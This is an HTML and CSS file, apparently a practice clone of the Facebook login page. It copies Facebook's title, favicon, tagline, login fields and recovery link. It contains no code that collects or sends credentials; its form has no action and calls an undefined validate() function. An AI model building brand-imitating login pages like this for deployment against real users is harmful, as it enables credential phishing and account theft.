<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Facebook-log in or sign up</title>
	<link rel="icon" type="img/png" href="https://upload.wikimedia.org/wikipedia/en/thumb/0/04/Facebook_f_logo_%282021%29.svg/640px-Facebook_f_logo_%282021%29.svg.png">
	<style type="text/css">
		.lgnfrm{
			margin-left:160px;
			
			width:396px;height: 350px;
			padding: 20px;
			box-shadow: 0px 0px 10px dimgray;
			background-color: whitesmoke;
			border-radius: 10px;

		}
		.fblo{
/*			border: 1px solid black;*/
			margin-left: 300px;
			
		}
		input{
			width: 364px;padding-top: 20px;
			padding-bottom: 10px;
			background-color: transparent;
			outline: green;
			color: black;
			border-color: #aba9a4;
			border-radius: 10px;
			font-weight: bold;
			font-size: 15px;

		}
		input[name="btn"]{
			border: none;
			color: white;
			background-color: #004daa;
		
			border-radius: 10px;
			font-size: 20px;
		}
		input[name="crtacc"]{
			border: none;
			color: white;
    		border-radius: 6px;
    		font-size: 17px;
    		font-weight: bolder;
    		line-height: 48px;
   			padding: 0 16px;
   			background-color: rgb(53, 146, 34);
   			width: 200px;

		}
		input[name="crtacc"]:hover{
			background-color: green;
		}

		.logo{
			background-image: url(fblogo1.png);
/*			margin-top: 25px;*/
			height: 250px;
			width: 400px;
			background-size: cover;
		}
		.div123{display: flex;
			margin-top: 100px;
			margin-left: 230px;

		}
		p{
			color: black;
			margin-left: 220px;
		}
		input[name="usr"][name="pwd"]:focus{
			border-color: blue;
		}
	/*	input[name="pwd"]:focus{
			border-color: blue;*/
		}
		p a {text-decoration: none;
			color: black;
			font-weight: bolder;

		}
		p a:hover{
			text-decoration-line: underline;
			text-decoration-color: black;


		}
		.lgnfrm a {
			text-decoration: none;
			color: blue;
		}
		.lgnfrm a:hover {
			font-weight: bolder;
			text-decoration-line: underline;
			text-decoration-color: lightblue;
			}
	</style>
</head>
<body style="background-color:#E3E3E3
;">
	<div style="width:900px; height:536px" class="div123" >
		<div class="fblo" style="width:400px; height: 258px;">
			<!-- <img src="fblogo1.png" name="logo" style="background-color:transparent;"> -->
			<div class="logo" align="left"></div>
			<h2 style="color:black;">Facebook helps you connect and share with the people in your life.</h2>

						
			</div>
			<div align="center" >
				<form class="lgnfrm">
					<input type="text" name="usr" placeholder="Email address or phone number" required><br><br>
					<input type="password" name="pwd"placeholder="Password" required><br><br>
					<input type="submit" name="btn" value="Log in" onclick="validate()"><br><br>
					<a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">Forgotten password?</a>
					<hr>
					<br>
					<input type="button" name="crtacc" value="Creat new account">
				</form>
				<p><a href="">Create a Page </a>for a celebrity, brand or business.</p>
			</div>
			
		</div>
	</div>
</body>
</html>